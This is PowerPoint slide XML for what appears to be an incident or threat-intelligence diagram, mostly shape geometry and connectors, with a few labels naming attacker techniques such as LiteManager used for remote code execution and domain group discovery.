                  <a:gd name="connsiteY1" fmla="*/ 178538 h 178538"/>
                  <a:gd name="connsiteX2" fmla="*/ 0 w 178590"/>
                  <a:gd name="connsiteY2" fmla="*/ 89243 h 178538"/>
                  <a:gd name="connsiteX3" fmla="*/ 89295 w 178590"/>
                  <a:gd name="connsiteY3" fmla="*/ 0 h 178538"/>
                  <a:gd name="connsiteX4" fmla="*/ 178590 w 178590"/>
                  <a:gd name="connsiteY4" fmla="*/ 89243 h 178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590" h="178538">
                    <a:moveTo>
                      <a:pt x="178590" y="89243"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="178590" y="138572"/>
                      <a:pt x="138624" y="178538"/>
                      <a:pt x="89295" y="178538"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39966" y="178538"/>
                      <a:pt x="0" y="138572"/>
                      <a:pt x="0" y="89243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="39966"/>
                      <a:pt x="39966" y="0"/>
                      <a:pt x="89295" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138624" y="0"/>
                      <a:pt x="178590" y="39966"/>
                      <a:pt x="178590" y="89243"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="13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SK"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="100" name="Freeform 99">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA77C210-C476-0C92-82D5-26003098D300}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="14027225" y="3493572"/>
                <a:ext cx="1160569" cy="1339172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY0" fmla="*/ 267885 h 1339172"/>
                  <a:gd name="connsiteX1" fmla="*/ 401748 w 1160569"/>
                  <a:gd name="connsiteY1" fmla="*/ 446422 h 1339172"/>
                  <a:gd name="connsiteX2" fmla="*/ 535664 w 1160569"/>
                  <a:gd name="connsiteY2" fmla="*/ 619147 h 1339172"/>
                  <a:gd name="connsiteX3" fmla="*/ 535664 w 1160569"/>
                  <a:gd name="connsiteY3" fmla="*/ 982032 h 1339172"/>
                  <a:gd name="connsiteX4" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY4" fmla="*/ 1026653 h 1339172"/>
                  <a:gd name="connsiteX5" fmla="*/ 714200 w 1160569"/>
                  <a:gd name="connsiteY5" fmla="*/ 1026653 h 1339172"/>
                  <a:gd name="connsiteX6" fmla="*/ 758821 w 1160569"/>
                  <a:gd name="connsiteY6" fmla="*/ 982032 h 1339172"/>
                  <a:gd name="connsiteX7" fmla="*/ 714200 w 1160569"/>
                  <a:gd name="connsiteY7" fmla="*/ 937411 h 1339172"/>
                  <a:gd name="connsiteX8" fmla="*/ 624905 w 1160569"/>
                  <a:gd name="connsiteY8" fmla="*/ 937411 h 1339172"/>
                  <a:gd name="connsiteX9" fmla="*/ 624905 w 1160569"/>
                  <a:gd name="connsiteY9" fmla="*/ 848116 h 1339172"/>
                  <a:gd name="connsiteX10" fmla="*/ 714200 w 1160569"/>
                  <a:gd name="connsiteY10" fmla="*/ 848116 h 1339172"/>
                  <a:gd name="connsiteX11" fmla="*/ 758821 w 1160569"/>
                  <a:gd name="connsiteY11" fmla="*/ 803495 h 1339172"/>
                  <a:gd name="connsiteX12" fmla="*/ 714200 w 1160569"/>
                  <a:gd name="connsiteY12" fmla="*/ 758875 h 1339172"/>
                  <a:gd name="connsiteX13" fmla="*/ 624905 w 1160569"/>
                  <a:gd name="connsiteY13" fmla="*/ 758875 h 1339172"/>
                  <a:gd name="connsiteX14" fmla="*/ 624905 w 1160569"/>
                  <a:gd name="connsiteY14" fmla="*/ 619147 h 1339172"/>
                  <a:gd name="connsiteX15" fmla="*/ 758821 w 1160569"/>
                  <a:gd name="connsiteY15" fmla="*/ 446422 h 1339172"/>
                  <a:gd name="connsiteX16" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY16" fmla="*/ 267885 h 1339172"/>
                  <a:gd name="connsiteX17" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY17" fmla="*/ 0 h 1339172"/>
                  <a:gd name="connsiteX18" fmla="*/ 892737 w 1160569"/>
                  <a:gd name="connsiteY18" fmla="*/ 89295 h 1339172"/>
                  <a:gd name="connsiteX19" fmla="*/ 1160569 w 1160569"/>
                  <a:gd name="connsiteY19" fmla="*/ 133916 h 1339172"/>
                  <a:gd name="connsiteX20" fmla="*/ 1160569 w 1160569"/>
                  <a:gd name="connsiteY20" fmla="*/ 477112 h 1339172"/>
                  <a:gd name="connsiteX21" fmla="*/ 1148262 w 1160569"/>
                  <a:gd name="connsiteY21" fmla="*/ 479597 h 1339172"/>
                  <a:gd name="connsiteX22" fmla="*/ 1044021 w 1160569"/>
                  <a:gd name="connsiteY22" fmla="*/ 636859 h 1339172"/>
                  <a:gd name="connsiteX23" fmla="*/ 1054473 w 1160569"/>
                  <a:gd name="connsiteY23" fmla="*/ 688631 h 1339172"/>
                  <a:gd name="connsiteX24" fmla="*/ 1024168 w 1160569"/>
                  <a:gd name="connsiteY24" fmla="*/ 694750 h 1339172"/>
                  <a:gd name="connsiteX25" fmla="*/ 919927 w 1160569"/>
                  <a:gd name="connsiteY25" fmla="*/ 852012 h 1339172"/>
                  <a:gd name="connsiteX26" fmla="*/ 969917 w 1160569"/>
                  <a:gd name="connsiteY26" fmla="*/ 972698 h 1339172"/>
                  <a:gd name="connsiteX27" fmla="*/ 978998 w 1160569"/>
                  <a:gd name="connsiteY27" fmla="*/ 978821 h 1339172"/>
                  <a:gd name="connsiteX28" fmla="*/ 977587 w 1160569"/>
                  <a:gd name="connsiteY28" fmla="*/ 979106 h 1339172"/>
                  <a:gd name="connsiteX29" fmla="*/ 873346 w 1160569"/>
                  <a:gd name="connsiteY29" fmla="*/ 1136368 h 1339172"/>
                  <a:gd name="connsiteX30" fmla="*/ 880413 w 1160569"/>
                  <a:gd name="connsiteY30" fmla="*/ 1171373 h 1339172"/>
                  <a:gd name="connsiteX31" fmla="*/ 811434 w 1160569"/>
                  <a:gd name="connsiteY31" fmla="*/ 1223714 h 1339172"/>
                  <a:gd name="connsiteX32" fmla="*/ 714200 w 1160569"/>
                  <a:gd name="connsiteY32" fmla="*/ 1277544 h 1339172"/>
                  <a:gd name="connsiteX33" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY33" fmla="*/ 1339172 h 1339172"/>
                  <a:gd name="connsiteX34" fmla="*/ 446368 w 1160569"/>
                  <a:gd name="connsiteY34" fmla="*/ 1277544 h 1339172"/>
                  <a:gd name="connsiteX35" fmla="*/ 0 w 1160569"/>
                  <a:gd name="connsiteY35" fmla="*/ 579401 h 1339172"/>
                  <a:gd name="connsiteX36" fmla="*/ 0 w 1160569"/>
                  <a:gd name="connsiteY36" fmla="*/ 133916 h 1339172"/>
                  <a:gd name="connsiteX37" fmla="*/ 267832 w 1160569"/>
                  <a:gd name="connsiteY37" fmla="*/ 89295 h 1339172"/>
                  <a:gd name="connsiteX38" fmla="*/ 580284 w 1160569"/>
                  <a:gd name="connsiteY38" fmla="*/ 0 h 1339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160569" h="1339172">
                    <a:moveTo>
                      <a:pt x="580284" y="267885"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="481679" y="267885"/>
                      <a:pt x="401748" y="347764"/>
                      <a:pt x="401748" y="446422"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="401748" y="529434"/>
                      <a:pt x="458453" y="599531"/>
                      <a:pt x="535664" y="619147"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="535664" y="982032"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="535664" y="1006566"/>
                      <a:pt x="555751" y="1026653"/>
                      <a:pt x="580284" y="1026653"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="714200" y="1026653"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="738734" y="1026653"/>
                      <a:pt x="758821" y="1006566"/>
                      <a:pt x="758821" y="982032"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="758821" y="957499"/>
                      <a:pt x="738734" y="937411"/>
                      <a:pt x="714200" y="937411"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="624905" y="937411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624905" y="848116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714200" y="848116"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="738734" y="848116"/>
                      <a:pt x="758821" y="828029"/>
                      <a:pt x="758821" y="803495"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="758821" y="778962"/>
                      <a:pt x="738734" y="758875"/>
                      <a:pt x="714200" y="758875"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="624905" y="758875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624905" y="619147"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="702116" y="599542"/>
                      <a:pt x="758821" y="529439"/>
                      <a:pt x="758821" y="446422"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="758821" y="347764"/>
                      <a:pt x="678943" y="267885"/>
                      <a:pt x="580284" y="267885"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="580284" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="671776" y="32590"/>
                      <a:pt x="776241" y="63873"/>
                      <a:pt x="892737" y="89295"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="988728" y="110272"/>
                      <a:pt x="1078441" y="124552"/>
                      <a:pt x="1160569" y="133916"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1160569" y="477112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1148262" y="479597"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1087004" y="505507"/>
                      <a:pt x="1044021" y="566163"/>
                      <a:pt x="1044021" y="636859"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1054473" y="688631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1024168" y="694750"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="962910" y="720660"/>
                      <a:pt x="919927" y="781316"/>
                      <a:pt x="919927" y="852012"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="919927" y="899143"/>
                      <a:pt x="939031" y="941811"/>
                      <a:pt x="969917" y="972698"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="978998" y="978821"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="977587" y="979106"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="916329" y="1005016"/>
                      <a:pt x="873346" y="1065672"/>
                      <a:pt x="873346" y="1136368"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="880413" y="1171373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811434" y="1223714"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="780645" y="1243791"/>
                      <a:pt x="748183" y="1261812"/>
                      <a:pt x="714200" y="1277544"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="580284" y="1339172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446368" y="1277544"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="174559" y="1151677"/>
                      <a:pt x="0" y="879345"/>
                      <a:pt x="0" y="579401"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="133916"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="82131" y="124553"/>
                      <a:pt x="171841" y="110272"/>
                      <a:pt x="267832" y="89295"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="384325" y="63819"/>
                      <a:pt x="488793" y="32590"/>
                      <a:pt x="5802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SK"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="104" name="Elbow Connector 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84AC317E-0575-EBD8-435F-35B762DE28EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="76" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9384220" y="589212"/>
            <a:ext cx="527608" cy="318948"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1598"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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Elbow Connector 105">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD84E656-8FC5-EC9A-CC06-74E080B5CCAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="83" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10067294" y="1187248"/>
            <a:ext cx="356096" cy="312546"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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Elbow Connector 107">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51322C05-9FDD-7C98-A6C1-F4650AE5C80C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="33" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11627357" y="3503861"/>
            <a:ext cx="554166" cy="368768"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 155"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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Elbow Connector 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8815554B-9C8B-0CE4-ADDF-20A0C9D51047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="11427456" y="3718637"/>
            <a:ext cx="953968" cy="554166"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99424"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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Elbow Connector 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29B8CBF1-5D64-7AEE-FDDE-92349D301167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884237" y="4246981"/>
            <a:ext cx="2040406" cy="554166"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99950"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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Elbow Connector 116">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37D3CDE1-0565-7400-A201-68AE1DAFE359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884237" y="4828006"/>
            <a:ext cx="2040406" cy="554166"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99950"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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Elbow Connector 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BE6DA3F-90F7-E0E1-262E-26512ACF944C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884237" y="5418556"/>
            <a:ext cx="2040406" cy="554166"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99950"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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Elbow Connector 118">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C07D8CA6-0004-F9C2-DDBD-2371A25C44D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8626729" y="26504"/>
            <a:ext cx="527608" cy="318948"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1598"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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Elbow Connector 120">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10787E57-98AC-699B-54BC-9A095EF32E83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="11436563" y="7842178"/>
            <a:ext cx="944696" cy="545223"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99828"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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Elbow Connector 123">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C19E54EC-B654-4A11-A234-99FC2ADE3761}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11627359" y="7629215"/>
            <a:ext cx="554164" cy="351931"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2158"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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Elbow Connector 126">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EBA6C91-AA23-A259-8D7E-BC190049D4C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="12199466" y="9021701"/>
            <a:ext cx="944696" cy="545223"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99828"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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Elbow Connector 127">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2E52D70-A0E7-4B73-300B-67BAB4F357F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="8315852" y="4294815"/>
            <a:ext cx="5646368" cy="548350"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99925"/>
            </a:avLst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Elbow Connector 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25306CF0-7A7F-1733-0FCA-D5FAB17B0E06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372400" y="2250090"/>
            <a:ext cx="1535780" cy="545842"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100027"/>
            </a:avLst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Elbow Connector 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2CAF88E-3635-0901-0671-A8BDAFDFA4CA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670633" y="1953151"/>
            <a:ext cx="935284" cy="549872"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99751"/>
            </a:avLst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Rectangle: Rounded Corners 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79B5919E-6482-E392-A986-0DF1584865B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11874935" y="1845047"/>
            <a:ext cx="3678240" cy="467642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1371600"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Incident IOC – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LiteManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> used for RCE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Rectangle: Rounded Corners 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E7CD153-2081-EEE8-5A1F-48D14EA5448E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12126679" y="4778371"/>
            <a:ext cx="3678240" cy="467642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1371600"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Time discovery through net command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Rectangle: Rounded Corners 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CCB73D0-FCC0-6004-B277-4B84559D144B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12724537" y="8933912"/>
            <a:ext cx="4162270" cy="467642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1371600"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Permission Groups discovery – Domain (F1102b)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78810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E42597-3A05-48AC-C7C4-AD74BB6AE5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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7340259-622C-2374-52D9-AD160BBBB7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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
